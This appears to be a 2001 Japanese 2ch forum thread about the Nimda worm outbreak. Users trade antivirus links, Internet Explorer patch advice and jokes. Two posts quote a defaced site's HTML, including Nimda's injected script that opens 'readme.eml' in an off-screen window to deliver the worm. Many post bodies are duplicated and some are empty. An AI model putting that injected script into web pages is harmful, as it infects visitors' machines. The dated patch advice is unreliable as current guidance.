自分とこのPCが感染してるかとか、一向に気にならないようだ。
ヴァカばっか。
だれも、この事件のこと、話題にしないんだよね。
ネットとかは、休み時間に見る人ばかりで、
そーいう方面、疎いのかな?
自分とこのPCが感染してるかとか、一向に気にならないようだ。
ヴァカばっか。
650 :ナナシサン:01/09/20 09:38 ID:O1n7WF1w
>649
その人のPC依存率によるのでは?
PCがなくても困らない人ってのはいますから。
ウイルスにやられてもOSがおかしくなった程度にしか
思わないんじゃないですかね。
その人のPC依存率によるのでは?
PCがなくても困らない人ってのはいますから。
ウイルスにやられてもOSがおかしくなった程度にしか
思わないんじゃないですかね。
651 : :01/09/20 09:40 ID:AA35cEbw
ウィルスの名前ってどこがつけるんだっけ?
652 :ナナシサン:01/09/20 10:00 ID:O1n7WF1w
>651
http://www.google.com/search?q=cache:MdHXnlnGYzI:bizit.nikkeibp.co.jp/it/sec/articles/1999071502.shtml+%83R%83%93%83s%83%85%81%5B%83%5E%83E%83C%83%8B%83X%81%40%96%BD%96%BC%81%40%8B%40%8A%D6&hl=ja
公的な機関はないのかもしれん・・・
しかしソースが1999年7月だからな
間違ってたらスマソ
http://www.google.com/search?q=cache:MdHXnlnGYzI:bizit.nikkeibp.co.jp/it/sec/articles/1999071502.shtml+%83R%83%93%83s%83%85%81%5B%83%5E%83E%83C%83%8B%83X%81%40%96%BD%96%BC%81%40%8B%40%8A%D6&hl=ja
公的な機関はないのかもしれん・・・
しかしソースが1999年7月だからな
間違ってたらスマソ
653 :掘:01/09/20 10:15 ID:qJwJ0ygo
654 : :01/09/20 10:17 ID:NXS2X.Cs
圧縮版に行けないんだけど何で?
655 : :01/09/20 10:20 ID:EdcF/vcc
656 : :01/09/20 10:24 ID:AA35cEbw
657 : :01/09/20 10:25 ID:urx2Rr2g
>>506
のリンク先はHappyTimeウイルスがあるみたい。開かないほうがよいよ。
HappyTimeの情報。
http://www.nai.com/japan/virusinfo/virH.asp?v=VBS/Haptime@MM
のリンク先はHappyTimeウイルスがあるみたい。開かないほうがよいよ。
HappyTimeの情報。
http://www.nai.com/japan/virusinfo/virH.asp?v=VBS/Haptime@MM
658 : :01/09/20 10:29 ID:QJ0fB.Us
キャッシュとしてPC内に保存された感染htmlファイルは
削除するだけでよいの?
削除するだけでよいの?
ウイルスバスター 何故か自動アップデートが効かない…
はねられる。この間はOKだった。
iniも正常。
しょうがないから2.1Mあるvsapi.zip落としてる。
はねられる。この間はOKだった。
iniも正常。
しょうがないから2.1Mあるvsapi.zip落としてる。
661 :タモリメンバー:01/09/20 10:37 ID:MlF6XPfk
ハングル語はムニダ
ex.ハサムニダ
ワームはNimda ニムダ
ex.ハサムニダ
ワームはNimda ニムダ
662 : :01/09/20 10:42 ID:07qKdj7U
664 :掘:01/09/20 11:38 ID:0pDLrXVM
665 :もう知ってる?:01/09/20 11:42 ID:1yQwLFz6
トレンドマイクロが駆除のページ作った。
http://www.trendmicro.co.jp/nimda/
http://www.trendmicro.co.jp/nimda/
666 :666:01/09/20 11:51 ID:XNtb4AoU
666ゲットー
667 :掘:01/09/20 12:16 ID:y3ZACcMk
668 : :01/09/20 12:23 ID:eH54z/nw
669 : :01/09/20 12:27 ID:0Fush0Uo
670 : :01/09/20 12:46 ID:eH54z/nw
671 : :01/09/20 12:48 ID:eH54z/nw
ココもダメ
http://.dion.ne.jp/
http://.dion.ne.jp/
672 : :01/09/20 12:53 ID:nR4wV7Qc
テレビ朝日で、米報復を混乱させる事も出来るとか言ってるけど、出来るの?
核攻撃の指揮系統がどうこうって…核攻撃の指揮ってhttpなの?
核攻撃の指揮系統がどうこうって…核攻撃の指揮ってhttpなの?
673 :超初心者すれ、1000超えちった。:01/09/20 13:01 ID:fFIpnHYM
昨日から何回やっても、IEのSP2がインストールできない。
(ダウンロードだけはした)
一応ノートン先生のリストは更新して、ニムダ入れたけど、
これで大丈夫ですか?
(ダウンロードだけはした)
一応ノートン先生のリストは更新して、ニムダ入れたけど、
これで大丈夫ですか?
674 :ぺ ◆lPYiMAEY :01/09/20 13:04 ID:28E6i1rE
>672
いや、そういうことではなく、例えば今回のようにMSNなどの有名な
サイトが書き換えられると、それを見たPCからLANなどを透して感染
してしまう恐れがあるということだと思われ。
でも、テレ朝のコメンテーターもよくわかっていないのもこれまた確か(w
いや、そういうことではなく、例えば今回のようにMSNなどの有名な
サイトが書き換えられると、それを見たPCからLANなどを透して感染
してしまう恐れがあるということだと思われ。
でも、テレ朝のコメンテーターもよくわかっていないのもこれまた確か(w
675 :ぺ ◆lPYiMAEY :01/09/20 13:05 ID:28E6i1rE
>673
ウィルススキャンは?
今すぐにやってちょーだいな。
ウィルススキャンは?
今すぐにやってちょーだいな。
676 : :01/09/20 13:09 ID:X7y2Jy2o
nimda = admin
ウイルス駆除ソフト持ってない人で気になる人はオンラインスキャンだけ
でもやってみよう。駆除はできないけど。
http://housecall.antivirus.com/housecall/start_jp.asp
激しく既出と思われ・・・
ウイルス駆除ソフト持ってない人で気になる人はオンラインスキャンだけ
でもやってみよう。駆除はできないけど。
http://housecall.antivirus.com/housecall/start_jp.asp
激しく既出と思われ・・・
678 :英語が苦手:01/09/20 13:15 ID:vw.uapsA
日本以外の国、とくにアメリカあたりの大きい機関も感染してるのかな?
679 :名無しさん:01/09/20 13:28 ID:MlF6XPfk
参ったよ、
学校でnetしているけど
nimdaのことを書いてあるのに
それにIE5.5SP1だっていうのにIEでHP見てる奴が多いよ
NNがあるんだからそっちを使えよ
世間的にウィルスには疎い人が多いか?
学校でnetしているけど
nimdaのことを書いてあるのに
それにIE5.5SP1だっていうのにIEでHP見てる奴が多いよ
NNがあるんだからそっちを使えよ
世間的にウィルスには疎い人が多いか?
680 : :01/09/20 13:32 ID:FD5viAuU
平素より MSN をご利用いただき、まことにありがとうございます。
9 月 18 日夜 11 時より、MSN(http://www.msn.co.jp/)において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。
また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。
自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1
これ以外のブラウザを利用されている方は、MSN(http://www.msn.co.jp/)にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。
「Nimda」には以下の機能があります。
1. 電子メールによって「Nimda」を配付
2. ネットワーク上の他のコンピューターに「Nimda」をインストール
3. インターネット上のサーバーにアクセスして、可能であれば「Nimda」をインストール
尚、「Nimda」のアンインストールには以下のソフトウェアが必要です。
トレドマイクロ社(http://www.trendmicro.co.jp/)ウイルスバスター2002
シマンテック社(http://www.symantec.co.jp/)ノートン・アンチウィルス 2002
「Nimda」は Windows 95/ 98 / Me / NT / 2000 でご利用いただけます。
MSN(http://www.msn.co.jp/)は、月間ユニークユーザー数1600万人(2001年7月)を誇る
日本で有数のウイルスポータルサイトです。今後ともよろしくお願いします。
9 月 18 日夜 11 時より、MSN(http://www.msn.co.jp/)において、新しく多彩なウイルス
体験のできるソフトウェア「Nimda」の配付を開始いたしました。
また、これにともない、昨晩同時刻以降 MSN のサーバーをご覧になったお客様には、自動的に
「Nimda」がインストールされるようになっています。
自動インストールには以下のバージョンのブラウザが必要です。
Internet Explorer 5.01 または Internet Explorer 5.01 SP1
Internet Explorer 5.5 または Internet Explorer 5.5 SP1
これ以外のブラウザを利用されている方は、MSN(http://www.msn.co.jp/)にアクセスすると
ファイルをダウンロードするように求められるのでダウンロードして実行してください。
「Nimda」には以下の機能があります。
1. 電子メールによって「Nimda」を配付
2. ネットワーク上の他のコンピューターに「Nimda」をインストール
3. インターネット上のサーバーにアクセスして、可能であれば「Nimda」をインストール
尚、「Nimda」のアンインストールには以下のソフトウェアが必要です。
トレドマイクロ社(http://www.trendmicro.co.jp/)ウイルスバスター2002
シマンテック社(http://www.symantec.co.jp/)ノートン・アンチウィルス 2002
「Nimda」は Windows 95/ 98 / Me / NT / 2000 でご利用いただけます。
MSN(http://www.msn.co.jp/)は、月間ユニークユーザー数1600万人(2001年7月)を誇る
日本で有数のウイルスポータルサイトです。今後ともよろしくお願いします。
682 :673:01/09/20 13:50 ID:/lPhkPKQ
>675
ウィルススキャンは今日一度やってみました。
結果、その時点では異常なし。
>677
nortonゴミ箱って何ですか?
表示名で言うとどれでしょう?
(Auto Protectのことでしょうか?)
ウィルススキャンは今日一度やってみました。
結果、その時点では異常なし。
>677
nortonゴミ箱って何ですか?
表示名で言うとどれでしょう?
(Auto Protectのことでしょうか?)
683 :1:01/09/20 13:54 ID:c1dxfJIM
684 : ◆DM7hlrsA :01/09/20 13:54 ID:/f1iH98s
IE4の場合はどうなるんでしょう?
98を素で使っているのですが。
98を素で使っているのですが。
685 : :01/09/20 13:55 ID:LlxECpb6
ttp://www.vintage-solutions.com/indexns4-jpn.html
Antidoteも対策出たよ。簡易版で検出できる。
Antidoteも対策出たよ。簡易版で検出できる。
686 :1:01/09/20 13:56 ID:c1dxfJIM
あと、対処法がすごくよくまとめられてるページ見つけたよ。
http://staff.aist.go.jp/takagi.hiromitsu/intra/security/alert/20010919-1.html
http://staff.aist.go.jp/takagi.hiromitsu/intra/security/alert/20010919-1.html
687 :名無し:01/09/20 13:57 ID:xhWR4MkE
/ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| Nimdaのおかげで、あほユーザーもバージョンアップの
| ありがたみをわかったみたいですなあ、ノートンはん。
| この調子でXPも売りまくらんとな〜!
\__________ ____________
|/
∧ ∧ ∧,,∧
( ゚Д゚) 目 ミ゚Д゚ ミ
(|ピー |) || (ミ ビ ミ)
〜| ター.| || ミ ル ミ〜
∪ ∪ .|| ∪ ∪
/|
/ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| うちもおかげで10月5日にはタダ同然になるNAV2001が
| バカウレですがな。
| 在庫一掃、がんばりまっせ!
\_______________________
| Nimdaのおかげで、あほユーザーもバージョンアップの
| ありがたみをわかったみたいですなあ、ノートンはん。
| この調子でXPも売りまくらんとな〜!
\__________ ____________
|/
∧ ∧ ∧,,∧
( ゚Д゚) 目 ミ゚Д゚ ミ
(|ピー |) || (ミ ビ ミ)
〜| ター.| || ミ ル ミ〜
∪ ∪ .|| ∪ ∪
/|
/ ̄ ̄ ̄  ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
| うちもおかげで10月5日にはタダ同然になるNAV2001が
| バカウレですがな。
| 在庫一掃、がんばりまっせ!
\_______________________
688 :ぺ ◆lPYiMAEY :01/09/20 14:00 ID:28E6i1rE
>684
IE4.0はマイクロソフトの発表がないから不明。
害なしとの意見もあるけど、アップデートを行うのが得策。
今後のためにもそれが一番いい方法。
IE4.0はマイクロソフトの発表がないから不明。
害なしとの意見もあるけど、アップデートを行うのが得策。
今後のためにもそれが一番いい方法。
689 :xxx:01/09/20 14:03 ID:z8CiHm1c
ここに、遣られているサーバ有るよ、感染しないかチェックする?
http://spider.comcom.co.jp/
<html><body bgcolor=black><br><br><br><br><br>
<br><table width=100%><td><p align="center"><font size=7 color=red>
fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:[email protected]</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
http://spider.comcom.co.jp/
<html><body bgcolor=black><br><br><br><br><br>
<br><table width=100%><td><p align="center"><font size=7 color=red>
fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:[email protected]</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
690 :xxx:01/09/20 14:07 ID:z8CiHm1c
ここに、遣られているサーバ有るよ、感染しないかチェックする?
http://spider.comcom.co.jp/
<html><body bgcolor=black><br><br><br><br><br>
<br><table width=100%><td><p align="center"><font size=7 color=red>
fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:[email protected]</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
http://spider.comcom.co.jp/
<html><body bgcolor=black><br><br><br><br><br>
<br><table width=100%><td><p align="center"><font size=7 color=red>
fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:[email protected]</html>
<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>
691 : :01/09/20 14:08 ID:HVl9sfT2
ポートはどこが狙われてますか?
1243が頻繁にかかるようなんですけど。
1243が頻繁にかかるようなんですけど。
692 :1:01/09/20 14:16 ID:c1dxfJIM
693 : :01/09/20 14:20 ID:HVl9sfT2
調べたら送信元はNTTインホスヒアだったが。
なんだねNTT。
なんだねNTT。
694 : :01/09/20 14:50 ID:VuSJ95M.
面倒臭い
695 :1:01/09/20 15:17 ID:QmREZy2.
696 :1:01/09/20 15:18 ID:QmREZy2.
697 :のぼdy:01/09/20 15:19 ID:jgxKO8Dg
アフガニスタンは
大飢饉でこの一年に餓死者100万人以上。
難民流入で都市は大難民キャンプ状態。
アメリカが来ると聞いても残る者は
金か体力かパスポートの無い者ばかり。
かといって攻めなきゃラディソの思い通り。
高貴なワシはどうすべき?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000963809
大飢饉でこの一年に餓死者100万人以上。
難民流入で都市は大難民キャンプ状態。
アメリカが来ると聞いても残る者は
金か体力かパスポートの無い者ばかり。
かといって攻めなきゃラディソの思い通り。
高貴なワシはどうすべき?
http://news.2ch.net/test/read.cgi?bbs=news&key=1000963809
698 :にゃごにゃご ◆SiztG/RU :01/09/20 15:43 ID:e1cEnHpk
Nimda 騒ぎでノートンのAVと、インターネットセキュリティだったかを
導入したんだけど、私のPCに何度も不正アクセスしてくる
リモートシステムがあります。
私のPCのIPアドレスが漏れてるってことでしょうか?
導入したんだけど、私のPCに何度も不正アクセスしてくる
リモートシステムがあります。
私のPCのIPアドレスが漏れてるってことでしょうか?
699 : :01/09/20 15:45 ID:bNS4Mhng
今 Yhoo! JAPANの検索が出来ないけど
何かあったか?
何かあったか?
700 : :01/09/20 15:46 ID:jo2.o9nk
# たまに復活
>>691
ポート1243が狙われるのはnimdaではなくて、sunrpcというサービスの
セキュリティホールを突く別のウイルス(ワーム)。
今回の問題とは無関係なので無視して良い。UNIX系の人は注意すべし。
>>691
ポート1243が狙われるのはnimdaではなくて、sunrpcというサービスの
セキュリティホールを突く別のウイルス(ワーム)。
今回の問題とは無関係なので無視して良い。UNIX系の人は注意すべし。
702 :ななし:01/09/20 15:48 ID:gQrgF2Mk
うちの会社のシステムのおばはんは遊んでるけど不安だわ。
こんなんでいいのかよ?
こんなんでいいのかよ?
703 :にゃごにゃご ◆SiztG/RU :01/09/20 15:50 ID:e1cEnHpk
わーん、起動してから数分で何度も不正アクセスがある、、
恐い、、、これって、おかしいんでしょうか?
ノートンが何度も警告して、そのたび遮断してるんだけど、、
恐い、、、これって、おかしいんでしょうか?
ノートンが何度も警告して、そのたび遮断してるんだけど、、
>>698
いや、Code Red同様、単に片っ端からIPをサーチするワームなんで、
漏れている可能性はないと思う。その前に、IPが漏れていても固定IP
で接続していなければ大して気にする必要はないと思う。
(ADSL接続で固定IPのサービスで契約しているとか、専用線を引いているとか)
いや、Code Red同様、単に片っ端からIPをサーチするワームなんで、
漏れている可能性はないと思う。その前に、IPが漏れていても固定IP
で接続していなければ大して気にする必要はないと思う。
(ADSL接続で固定IPのサービスで契約しているとか、専用線を引いているとか)
706 :にゃごにゃご ◆SiztG/RU :01/09/20 15:52 ID:e1cEnHpk
707 :にゃごにゃご ◆SiztG/RU :01/09/20 15:54 ID:e1cEnHpk
708 : :01/09/20 16:20 ID:FD5viAuU
既出なんですが、念のため。
本日付でMSがNimdaに関しての詳細情報発表。
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
ミラー
http://www.asia.microsoft.com/japan/technet/security/nimdaalrt.asp
IISサーバーに関しての情報もありますので、サーバー管理者は目を通してください。
もし、次スレが出来るのであれば、1に貼り付けてください。
本日付でMSがNimdaに関しての詳細情報発表。
http://www.microsoft.com/japan/technet/security/nimdaalrt.asp
ミラー
http://www.asia.microsoft.com/japan/technet/security/nimdaalrt.asp
IISサーバーに関しての情報もありますので、サーバー管理者は目を通してください。
もし、次スレが出来るのであれば、1に貼り付けてください。
709 : :01/09/20 16:28 ID:jo2.o9nk
速報 ヤフー検索、6文字以上での検索は現在できません
710 : :01/09/20 17:45 ID:MLidW8w.
共有ファイル経由の感染の場合、どうやると感染するんだろ。
SP2当ててれば防げるの?感染しても表に出ないだけなのかな?
SP2当ててれば防げるの?感染しても表に出ないだけなのかな?
711 : :01/09/20 17:51 ID:EFWuB4H6
ファイル 「二井一禎先生00_3_3.doc.bat」 には 「W32.Sircam.Worm@mm」 ウィルスが感染していました。
ファイルは Norton AntiVirus によって検疫されました。 Wednesday, September 19, 2001 21:58
ファイルは Norton AntiVirus によって検疫されました。 Wednesday, September 19, 2001 21:58
712 : :01/09/20 18:05 ID:RtNwlScE
714 : :01/09/20 18:10 ID:4W2IDkK6
715 : :01/09/20 18:18 ID:RtNwlScE
716 : :01/09/20 18:21 ID:RtNwlScE
>>714
その謝罪? 内容から察するに信用情報までとはいかなくとも
顧客情報がマズい状態にあったように思われる。
こんな会社多いんじゃないのか、ニムダで暴露されて
よかったじゃん。
NTサーバー使ってる金融会社は要注意ていうか
なんで使うの??狙われやすいのを最初から使って
さらに管理さえ出来てない。
その謝罪? 内容から察するに信用情報までとはいかなくとも
顧客情報がマズい状態にあったように思われる。
こんな会社多いんじゃないのか、ニムダで暴露されて
よかったじゃん。
NTサーバー使ってる金融会社は要注意ていうか
なんで使うの??狙われやすいのを最初から使って
さらに管理さえ出来てない。
717 : :01/09/20 18:23 ID:IeqWJ1TA
ニムダにビビってサーフ控えるひと続出
↓
アフガンの情報シャットアウト
↓
アフガンの情報シャットアウト
718 : :01/09/20 18:39 ID:ZN.DEbLE
>>713
確かに >>708 のリンク先には 5.01/5.01SP1/5.5/5.5SP1 としか
書いてないが、元々の原因となったIEの脆弱性は
「それ以前のバージョンはサポート外で未検証」
なのだから(本文中の最初のリンク先に書いてある)
SP2以降あるいはIE6にするのが正しい対応。
「それ以前は大丈夫」だなんてどこにも書いてないだろ?
サポート外のブラウサにも穴がありますなんて丁寧に教えてくれるわけがない。
確かに >>708 のリンク先には 5.01/5.01SP1/5.5/5.5SP1 としか
書いてないが、元々の原因となったIEの脆弱性は
「それ以前のバージョンはサポート外で未検証」
なのだから(本文中の最初のリンク先に書いてある)
SP2以降あるいはIE6にするのが正しい対応。
「それ以前は大丈夫」だなんてどこにも書いてないだろ?
サポート外のブラウサにも穴がありますなんて丁寧に教えてくれるわけがない。
719 : :01/09/20 18:57 ID:kAuHM.hA
http://japan.cnet.com/News/2001/Item/010920-8.html?mn
しかし、MS ってヒドい会社だ。
しかし、MS ってヒドい会社だ。
721 :幹鏡?C靴舛磴辰:01/09/20 19:30 ID:EJ3hEcgk
linuxでかきこみてすとさせてー
722 :初心者です:01/09/20 19:45 ID:ANKMaKCQ
IE5.00と5.01は何がどう違うのか教えてください。
IE5.0SP2ってのでも駄目なのでしょうか。
IE5.0SP2ってのでも駄目なのでしょうか。
723 :ついでに:01/09/20 19:48 ID:ANKMaKCQ
724 :ななし:01/09/20 19:51 ID:OQ2XCEyM
質問すまそ。
IE5.5SP2 の full package をdownload したいのだけど、
どこで落とすことができますか?
ie5setup(500KB弱)しか落とすことができないんですよ・・・
どなたかよろしくお願いします。
IE5.5SP2 の full package をdownload したいのだけど、
どこで落とすことができますか?
ie5setup(500KB弱)しか落とすことができないんですよ・・・
どなたかよろしくお願いします。
725 : :01/09/20 19:52 ID:DU4iYfBk
>>722
細かいとこが違うとしか、いいようがない。
変更点が膨大すぎる。
IE5.0使ってるなら、この件に関して安全が確認されている
IE5.01SP2、IE5.5SP2、IE6.0のどれかにしとくことをすすめる。
細かいとこが違うとしか、いいようがない。
変更点が膨大すぎる。
IE5.0使ってるなら、この件に関して安全が確認されている
IE5.01SP2、IE5.5SP2、IE6.0のどれかにしとくことをすすめる。
726 : :01/09/20 19:53 ID:DU4iYfBk
>>724
ie5setupのコマンドラインオプションで、ローカルに保存しておいて、
あとでまとめてセットアップするってことが出来る。
えーと、細かいやりかたは忘れた。
マイクロソフトのサポートページで検索してくれ。
ie5setupのコマンドラインオプションで、ローカルに保存しておいて、
あとでまとめてセットアップするってことが出来る。
えーと、細かいやりかたは忘れた。
マイクロソフトのサポートページで検索してくれ。
727 :がー:01/09/20 19:55 ID:kKrbMDRM
雑誌の付録に5.5sp2入ってるの、ないかなぁ?
雑誌見ただけでは、sp2かどうかよく分からん…。
漏れって初心者だったのかなぁ。
雑誌見ただけでは、sp2かどうかよく分からん…。
漏れって初心者だったのかなぁ。
>>724
あ、簡単な方法もあったみたい。
http://www.microsoft.com/JAPAN/support/kb/articles/J047/1/48.htm?LN=JA&SD=SO&FR=0
ここはお気に入りにでもいれとくと、何かと役にたつよ。
http://search.support.microsoft.com/kb/c.asp?lng=jpn&sa=per
あ、簡単な方法もあったみたい。
http://www.microsoft.com/JAPAN/support/kb/articles/J047/1/48.htm?LN=JA&SD=SO&FR=0
ここはお気に入りにでもいれとくと、何かと役にたつよ。
http://search.support.microsoft.com/kb/c.asp?lng=jpn&sa=per
729 : :01/09/20 19:59 ID:ObZSOebQ
730 :がー:01/09/20 20:02 ID:kKrbMDRM
10月号ではASCII、DOS/Vマガジン、DOS/Vパワレポ、click、ネットランナーが
ダメだった。
Internetマガジンとか入れてそうなんだけどなー。
ムック系はどれも詳細バージョン書いてないのが腹立つ。
ダメだった。
Internetマガジンとか入れてそうなんだけどなー。
ムック系はどれも詳細バージョン書いてないのが腹立つ。
732 : <丶`∀´> :01/09/20 20:13 ID:HqYiIho.
<丶`∀´> ニムダ、ニダ!
733 :ななし:01/09/20 20:28 ID:OQ2XCEyM
734 : :01/09/20 20:43 ID:mewqhVfM
できないイムニダ。
735 : :01/09/20 20:52 ID:1xVPYvnw
すみません。質問させてください。
以前IE5.00からIE5.01に変更したつもり…だったんだけど。
バージョン情報を見たら 5.00.2919.6307です。
これはIE5.01になっているのでしょうか。
sp2にバージョンUPしていいのでしょうか?
以前IE5.00からIE5.01に変更したつもり…だったんだけど。
バージョン情報を見たら 5.00.2919.6307です。
これはIE5.01になっているのでしょうか。
sp2にバージョンUPしていいのでしょうか?
736 : :01/09/20 20:54 ID:pge4Y/OQ
737 : :01/09/20 20:56 ID:JrQSzpio
>>735
[IE5] Internet Explorer 5.0 のリリースされたバージョンとビルド番号
http://www.microsoft.com/japan/support/kb/articles/J051/6/55.htm
[IE5] Internet Explorer 5.0 のリリースされたバージョンとビルド番号
http://www.microsoft.com/japan/support/kb/articles/J051/6/55.htm
739 :トキ:01/09/20 21:36 ID:nWM2SqeE
お聞きいたします。
SP2をインストールしたのですが
更新バージョン:SP2; ってなってまして
その後の q295106; の数字が出ていませんが大丈夫でしょうか?
よろしくお願いします。
SP2をインストールしたのですが
更新バージョン:SP2; ってなってまして
その後の q295106; の数字が出ていませんが大丈夫でしょうか?
よろしくお願いします。
740 :737:01/09/20 21:37 ID:T3vADLK.
741 :777:01/09/20 21:38 ID:aqv7FWMg
本文入れる前に送信しちゃった。鬱死。
>>739
えーと、多分q295106;ってのは、SP2入れたあとに当てたHotfixのナンバーだと思います。
どんなの当てたかよく覚えてませんが。
今出てるSP2には既に含まれているのかもしれません。
念の為、WindowsUpdateで、追加のパッチが出てないか確認しておいた方がいいかもしれませんが、
特に気にすることでもないと思います。
MicroSoft自身が今回の件についてはSP2にすれば大丈夫といっていますので。
>>739
えーと、多分q295106;ってのは、SP2入れたあとに当てたHotfixのナンバーだと思います。
どんなの当てたかよく覚えてませんが。
今出てるSP2には既に含まれているのかもしれません。
念の為、WindowsUpdateで、追加のパッチが出てないか確認しておいた方がいいかもしれませんが、
特に気にすることでもないと思います。
MicroSoft自身が今回の件についてはSP2にすれば大丈夫といっていますので。
743 :初心者:01/09/20 21:42 ID:6yBGXegc
追記
q295106ってのはこんなやつだったようです。
http://www.microsoft.com/JAPAN/support/kb/articles/JP295/1/06.HTM?LN=JA&SD=SO&FR=0
q295106ってのはこんなやつだったようです。
http://www.microsoft.com/JAPAN/support/kb/articles/JP295/1/06.HTM?LN=JA&SD=SO&FR=0
745 :735:01/09/20 21:49 ID:1xVPYvnw
>736-738
回答ありがとうございました。
もう一つ質問よろしいでしょうか?
普段はJAVAスクリプト関連、ActiveX関連、cookieは切っています。
メーラーはBeckey2です。ノートンも入れています。
今回もliveUpdateしてスキャンしたら感染はないらしいです。
ですが、Winキー+Fで検索してみたところ
.exeや.eml、MEP*.TMP.EXEの拡張子が付いたファイルが
マイドキュメント内に4〜6個程でました。日付はほとんどが9/19 9/20です。
画像やログの保存はマイドキュメントにしています。
これはどのように判断したらいいのでしょう?
回答ありがとうございました。
もう一つ質問よろしいでしょうか?
普段はJAVAスクリプト関連、ActiveX関連、cookieは切っています。
メーラーはBeckey2です。ノートンも入れています。
今回もliveUpdateしてスキャンしたら感染はないらしいです。
ですが、Winキー+Fで検索してみたところ
.exeや.eml、MEP*.TMP.EXEの拡張子が付いたファイルが
マイドキュメント内に4〜6個程でました。日付はほとんどが9/19 9/20です。
画像やログの保存はマイドキュメントにしています。
これはどのように判断したらいいのでしょう?
746 : :01/09/20 21:52 ID:4mYWTu4Y
747 : :01/09/20 21:56 ID:pge4Y/OQ
>>745
ノートンのウィルススキャンの対象を「すべてのファイル」にして
スキャンしましたか?
定義ファイルは、今日だけで二度新しいのが出ていますから、
もいちどLiveUpdate してみて下さい。
ノートンのウィルススキャンの対象を「すべてのファイル」にして
スキャンしましたか?
定義ファイルは、今日だけで二度新しいのが出ていますから、
もいちどLiveUpdate してみて下さい。
748 :735:01/09/20 22:11 ID:1xVPYvnw
>745です。
>746-747 ありがとうございました。
pcを使うのは私だけなので家族ではないと思います。
勘違いならいいのですが。
今日もLiveUpdateをしたのですが、更新の必要はないと表示されました。
スキャンは全てのファイルを対象にして行いました。
もう一度、検索をして見ます。
>746-747 ありがとうございました。
pcを使うのは私だけなので家族ではないと思います。
勘違いならいいのですが。
今日もLiveUpdateをしたのですが、更新の必要はないと表示されました。
スキャンは全てのファイルを対象にして行いました。
もう一度、検索をして見ます。
749 :にゃごにゃご ◆SiztG/RU :01/09/20 22:36 ID:lEBv1kuk
750 : :01/09/20 22:38 ID:7Dxs6YOQ
>>748
そのぁ ゃ ι ぃ ファイルの名前を書き出してみ。
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/pe_nimda.htm
参考までに。
そのぁ ゃ ι ぃ ファイルの名前を書き出してみ。
http://www.nai.com/japan/virusinfo/virN.asp?v=W32/Nimda@MM
http://www.trendmicro.co.jp/virusinfo/pe_nimda.htm
参考までに。
751 : :01/09/20 23:10 ID:N/KFDXpc
ちょっと質問、失礼させて頂きます。
ウィンドウの右上にある、閉じる、最小化、最大化のボタンに
0や1と表示され、本来の形のボタン表示にならなくなってしまいました。
また、縦のスクロールバーの上下にある矢印ボタンにも
数字が表示され、本来の形で表示されておりません。
これらの原因は、このたび猛威をふるっているウィルスの影響なのでしょうか?
よろしくご指導の程願います。
ウィンドウの右上にある、閉じる、最小化、最大化のボタンに
0や1と表示され、本来の形のボタン表示にならなくなってしまいました。
また、縦のスクロールバーの上下にある矢印ボタンにも
数字が表示され、本来の形で表示されておりません。
これらの原因は、このたび猛威をふるっているウィルスの影響なのでしょうか?
よろしくご指導の程願います。
752 : :01/09/20 23:13 ID:7Dxs6YOQ
753 :わお:01/09/20 23:25 ID:9xK3ffSU
可及的速やかにDLしたのだが、結局は回線が混雑したためインスト不良で
ブラウザが使えなくなった。メールも送れなくなった。焦ったが、以前に
ブラウザをULした時の控えが残っていたのでそこから復旧した。
従って、今はIE5.0でつないでいる。なお、OSは95。
もう一度DLしたほうがいいのかな?
ブラウザが使えなくなった。メールも送れなくなった。焦ったが、以前に
ブラウザをULした時の控えが残っていたのでそこから復旧した。
従って、今はIE5.0でつないでいる。なお、OSは95。
もう一度DLしたほうがいいのかな?
754 : :01/09/20 23:31 ID:Y6nDql6A
>751
windowsフォルダのttfCacheっつーファイル(隠しファイルになっている)をごみ箱に入れて
再起動。
それで直るはず。
自己責任で。
windowsフォルダのttfCacheっつーファイル(隠しファイルになっている)をごみ箱に入れて
再起動。
それで直るはず。
自己責任で。
755 : :01/09/20 23:38 ID:aKPL38QI
>>751
スレ違い。少しは検索する知恵を身に付けてくれ
http://www.google.com/search?hl=ja&q=%89%BB%82%AF+%8D%C5%91%E5%89%BB+%83%7B%83%5E%83%93&lr=
聞いてるだけでは何も身に付かない
スレ違い。少しは検索する知恵を身に付けてくれ
http://www.google.com/search?hl=ja&q=%89%BB%82%AF+%8D%C5%91%E5%89%BB+%83%7B%83%5E%83%93&lr=
聞いてるだけでは何も身に付かない
756 :トキ:01/09/20 23:48 ID:nWM2SqeE
>>737さん
ありがとうございます。
>多分q295106;ってのは、SP2入れたあとに当てたHotfixのナンバーだと思います。
これは私には理解できないのですが
ひとまず安心しました、ありがとうございました。
ありがとうございます。
